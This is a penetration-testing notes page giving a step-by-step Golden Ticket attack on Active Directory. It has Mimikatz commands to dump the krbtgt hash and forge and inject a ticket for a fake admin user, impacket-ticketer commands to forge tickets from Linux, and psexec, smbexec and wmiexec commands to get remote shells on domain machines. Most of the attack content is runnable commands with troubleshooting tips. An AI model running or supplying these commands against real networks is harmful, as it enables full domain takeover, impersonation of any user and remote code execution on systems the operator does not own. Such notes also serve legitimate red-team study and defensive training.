Golden Ticket with krbtgt

Requirement:

Env -> domain controller
This attack assumes a Domain Controller compromise where KRBTGT account hash will be extracted which is a requirement for a successful Golden Ticket attack.

https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket

A Golden Ticket attack consist on the creation of a legitimate Ticket Granting Ticket (TGT) impersonating any user through the use of the NTLM hash of the Active Directory (AD) krbtgt account. This technique is particularly advantageous because it enables access to any service or machine within the domain as the impersonated user. It's crucial to remember that the krbtgt account's credentials are never automatically updated.

To acquire the NTLM hash of the krbtgt account, various methods can be employed. It can be extracted from the Local Security Authority Subsystem Service (LSASS) process or the NT Directory Services (NTDS.dit) file located on any Domain Controller (DC) within the domain. Furthermore, executing a DCsync attack is another strategy to obtain this NTLM hash, which can be performed using tools such as the lsadump::dcsync module in Mimikatz or the secretsdump.py script by Impacket. It's important to underscore that to undertake these operations, domain admin privileges or a similar level of access is typically required.

Sample extract krbtgt's account hash:

mimikatz # lsadump::lsa /inject /name:krbtgt

Golden Ticket Attack from Windows

Inject golden ticket to memory:

mimikatz # kerberos::golden /domain:offense.local /sid:S-1-5-21-4172452648-1021989953-2368502130 /rc4:8584cfccd24f6a7f49ee56355d41bd30 /user:newAdmin /id:500 /ptt

check the ticket with klist

Once you have the golden Ticket injected, you can access the shared files (C$), and execute services and WMI, so you could use psexec or wmiexec to obtain a shell (looks like yo can not get a shell via winrm).

switching back to the console the attacker used to create the golden ticket (local admin) and again attempting to access c$ share of the domain controller - this time is a success:

or Execute a cmd in the remote machine with PsExec:

.\PsExec.exe -accepteula \\<remote_hostname> cmd

reference:

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets#execution https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket

Golden Ticket Attack from Linux

Requirement:

krbtgt hash

Domain SID

#powerview
Get-ADDomain <domain_name>

#impacket

# generate the TGT with NTLM
impacket-ticketer -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> NewAdmin

# generate the TGT with AES key
impacket-ticketer -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> NewAdmin


# export ticket for impacket use
export KRB5CCNAME=<TGS_ccache_file>

# execute remote command with any of the folowing by using TGT
impacket-psexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass
impacket-smbexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass
impacket-wmiexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Don't forget to use hostname instead of IP address of the remote server

"Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)"

it's mean there is mismatch datetime between kali linux and the remote machine, because authenticating using TGT is using time also.

Solve with this:

sudo ntpdate $IP

Convert TGT Windows and Linux Format

https://github.com/Zer1t0/ticket_converter

To convert tickets between Linux/Windows format with ticket_converter.py:

python ticket_converter.py ticket.kirbi ticket.ccache
python ticket_converter.py ticket.ccache ticket.kirbi

PreviousDCSync NextLAPS

Last updated 1 year ago